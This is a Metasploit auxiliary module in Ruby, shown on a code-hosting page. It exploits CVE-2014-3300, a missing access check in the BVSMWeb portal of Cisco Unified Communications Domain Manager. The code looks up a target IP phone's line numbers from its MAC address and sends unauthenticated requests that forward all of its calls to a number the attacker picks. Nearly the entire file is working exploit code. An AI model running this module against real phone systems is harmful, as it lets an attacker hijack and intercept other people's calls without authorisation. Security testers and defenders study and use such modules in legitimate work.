Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/cisco_cucdm_call_forward.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'rexml/document'
7
8
class MetasploitModule < Msf::Auxiliary
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
16
'Description' => %q{
17
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
18
(CDM) 10 does not properly implement access control, which allows remote attackers to
19
modify user information. This module exploits the vulnerability to configure unauthorized
20
call forwarding.
21
},
22
'Author' => 'fozavci',
23
'References' => [
24
['CVE', '2014-3300'],
25
['BID', '68331']
26
],
27
'License' => MSF_LICENSE,
28
'Actions' => [
29
[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
30
[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
31
],
32
'DefaultAction' => 'Info',
33
'Notes' => {
34
'Stability' => [SERVICE_RESOURCE_LOSS],
35
'SideEffects' => [IOC_IN_LOGS],
36
'Reliability' => []
37
}
38
)
39
)
40
41
register_options(
42
[
43
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
44
OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),
45
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
46
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])
47
]
48
)
49
end
50
51
def run
52
case action.name.upcase
53
when 'INFO'
54
get_info
55
when 'FORWARD'
56
forward_calls
57
end
58
end
59
60
def get_info
61
uri = normalize_uri(target_uri.to_s)
62
mac = datastore['MAC']
63
64
print_status('Getting fintnumbers and display names of the IP phone')
65
66
res = send_request_cgi(
67
{
68
'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
69
'method' => 'GET',
70
'vars_get' => {
71
'device' => "SEP#{mac}"
72
}
73
}
74
)
75
76
unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
77
print_error('Target appears not vulnerable!')
78
print_status(res.to_s)
79
return []
80
end
81
82
doc = REXML::Document.new(res.body)
83
lines = []
84
fint_numbers = []
85
86
list = doc.root.get_elements('MenuItem')
87
88
list.each do |lst|
89
xlist = lst.get_elements('Name')
90
xlist.each { |l| lines << (l[0]).to_s }
91
xlist = lst.get_elements('URL')
92
xlist.each { |l| fint_numbers << (l[0].to_s.split('fintnumber=')[1]).to_s }
93
end
94
95
lines.size.times do |i|
96
print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
97
end
98
99
fint_numbers
100
end
101
102
def forward_calls
103
# for a specific FINTNUMBER redirection
104
uri = normalize_uri(target_uri.to_s)
105
forward_to = datastore['FORWARDTO']
106
mac = datastore['MAC']
107
108
if datastore['FINTNUMBER']
109
fint_numbers = [datastore['FINTNUMBER']]
110
else
111
fint_numbers = get_info
112
end
113
114
if fint_numbers.empty?
115
print_error('FINTNUMBER required to forward calls')
116
return
117
end
118
119
fint_numbers.each do |fintnumber|
120
print_status("Sending call forward request for #{fintnumber}")
121
122
send_request_cgi(
123
{
124
'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
125
'method' => 'GET',
126
'vars_get' => {
127
'cfoption' => 'CallForwardAll',
128
'device' => "SEP#{mac}",
129
'ProviderName' => 'NULL',
130
'fintnumber' => fintnumber.to_s,
131
'telno1' => forward_to.to_s
132
}
133
}
134
)
135
136
res = send_request_cgi(
137
{
138
'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
139
'method' => 'GET',
140
'vars_get' => {
141
'device' => "SEP#{mac}",
142
'fintnumber' => fintnumber.to_s
143
}
144
}
145
)
146
147
if res && res.body.to_s.include?('CFA')
148
print_good("Call forwarded successfully for #{fintnumber}")
149
else
150
print_error('Call forward failed')
151
end
152
end
153
end
154
end
155
156